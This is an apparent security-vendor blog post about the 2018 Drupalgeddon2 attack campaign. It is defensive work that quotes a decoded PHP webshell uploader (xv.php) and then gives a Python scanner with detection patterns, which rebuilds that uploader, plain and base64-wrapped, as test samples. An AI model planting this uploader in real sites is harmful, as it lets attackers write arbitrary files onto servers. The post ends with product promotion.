Our monitoring systems identified a first-wave malicious campaign on April 12th, 2018, the same day that proof-of-concept code went public.
The Drupal core security team had earlier released security advisory SA-CORE-2018-002 on 28 March. We released our blocking and detection rules a few days later, meaning that Imunify360 customers were already protected by the time the campaign started.
October saw a new burst of attacks on this vector. Botnets located on thousands of IPs requested access to Drupal-based sites to upload a malicious payload. The chart below shows the activity levels for the past few months.
Other payloads were seen with base64 encoding in the file sites/default/files/xv.php. Decoded, they look like a common file uploader:
<?php echo "xin0x g4me"; move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); ?>

Mitigation
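A dropped uploader like the xv.php above has two properties a defender can check for on disk: it is a PHP file sitting inside Drupal's public files directory, where no PHP should ever exist, and it writes a request-supplied upload with move_uploaded_file, possibly hidden behind one or more layers of base64. The following scanner is an added example written for this post (it is not Imunify360 code and not part of the original article); the sample files it builds in a temporary directory are constructed from the payload quoted above, and the indicator names and the three-layer decode limit are choices of this example.

```python
import base64
import os
import re
import tempfile

# Indicators of an uploader/webshell. The first is exactly what the decoded
# xv.php payload does; the second catches the base64-wrapped variants.
INDICATORS = {
    "upload_from_files_array": re.compile(r"move_uploaded_file\s*\(\s*\$_FILES"),
    "eval_of_decoded_blob": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
}

# Runs of base64 alphabet long enough to hide a payload (threshold is ours).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decoded_layers(text, max_layers=3):
    """Yield the source text, then every base64 run decoded, up to max_layers deep."""
    yield text
    pending = [text]
    for _ in range(max_layers):
        next_pending = []
        for layer in pending:
            for m in B64_RUN.finditer(layer):
                try:
                    decoded = base64.b64decode(m.group(0), validate=True)
                except ValueError:  # binascii.Error is a ValueError
                    continue
                decoded = decoded.decode("utf-8", "ignore")
                next_pending.append(decoded)
                yield decoded
        if not next_pending:
            break
        pending = next_pending


def classify_php(text):
    """Return the sorted indicator names matched in the text or any decoded layer."""
    hits = set()
    for layer in decoded_layers(text):
        for name, pattern in INDICATORS.items():
            if pattern.search(layer):
                hits.add(name)
    return sorted(hits)


def scan_files_dir(root):
    """Walk a public files directory; every PHP file found is reported, with indicators."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                findings.append((os.path.relpath(path, root), classify_php(fh.read())))
    return findings


# Constructed samples: the payload quoted in the post, the same payload
# base64-wrapped in an eval(), and a harmless non-PHP file that must be skipped.
PLAIN_UPLOADER = ("<?php echo \"xin0x g4me\"; "
                  "move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); ?>")
ENCODED_UPLOADER = "<?php eval(base64_decode('%s')); ?>" % (
    base64.b64encode(PLAIN_UPLOADER.encode()).decode())


def demo():
    """Build a constructed sites/default/files tree, scan it, return {path: indicators}."""
    with tempfile.TemporaryDirectory() as tmp:
        files_dir = os.path.join(tmp, "sites", "default", "files")
        os.makedirs(files_dir)
        samples = {
            "xv.php": PLAIN_UPLOADER,
            "xv_b64.php": ENCODED_UPLOADER,
            "notes.txt": "just an uploaded text attachment",
        }
        for name, body in samples.items():
            with open(os.path.join(files_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return dict(scan_files_dir(files_dir))


if __name__ == "__main__":
    for path, indicators in demo().items():
        print(path, indicators or "(php file in upload dir, no known pattern)")
```

Run it against a real install by calling scan_files_dir on the site's sites/default/files path; a PHP file that matches no indicator is still worth a look, because the directory should not contain PHP at all.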
Compared to vendor-specific and free WAF rules available online, our rules are much more difficult to circumvent.
Imunify360 is the best choice for your all-in-one security protection needs.
Oleg Boytsev is an analyst in the Imunify360 Threat Intelligence Group.